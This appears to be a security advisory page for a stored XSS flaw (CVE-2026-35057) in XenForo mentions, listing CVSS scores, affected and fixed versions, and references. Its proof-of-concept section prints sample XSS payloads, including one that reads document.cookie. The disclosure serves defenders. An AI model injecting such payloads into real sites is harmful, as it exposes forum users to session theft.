Security Vulnerability Report
CVE-2026-35057 CVSS 6.4 MEDIUM

Published: 2026-04-01 01:16:42
Last Modified: 2026-04-01 16:24:40

Description

XenForo before 2.3.10 and before 2.2.19 is vulnerable to stored cross-site scripting (XSS) in structured text mentions, primarily affecting legacy profile post content. An attacker can inject malicious scripts through crafted mentions that are stored and executed when other users view the content.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N (exploitability 3.1, impact 2.7)

Other scores recorded for this CVE:
CVSS 3.1 (NVD primary): 5.4 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N (exploitability 2.3, impact 2.7). This vector differs from the one above only in User Interaction (UI:R rather than UI:N), reflecting that a victim has to view the stored content for the script to run.
CVSS 4.0 (secondary): 5.1 MEDIUM, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Configurations (Affected Products)

cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* (versions before 2.2.19) - VULNERABLE
cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* (versions from 2.3.0 up to, but excluding, 2.3.10) - VULNERABLE
Fixed in XenForo 2.2.19 and 2.3.10.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// Proof of Concept for CVE-2026-35057
// Target: XenForo < 2.3.10 & < 2.2.19
// Vector: Structured text mention in legacy profile post
// Attacker injects a malicious payload through a crafted mention.
// The payload attempts to execute JavaScript when a user views the profile post.
// Example payload structure (conceptual); depending on the parser, the injection might look like this:
var payload = "[USER=1] onmouseover=alert(document.cookie) [/USER]";
// Alternatively, breaking out of the tag:
var payloadBreakout = "[USER=1]<img src=x onerror=alert('XSS')>[/USER]";
console.log("Payload to inject into profile post: " + payload);

References

https://github.com/methosiea/xenforo-2-xss (Exploit, Third Party Advisory)
https://xenforo.com/community/threads/xenforo-2-3-10-add-ons-and-2-2-19-released-includes-security-fix.236249/ (Release Notes)

Weakness

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')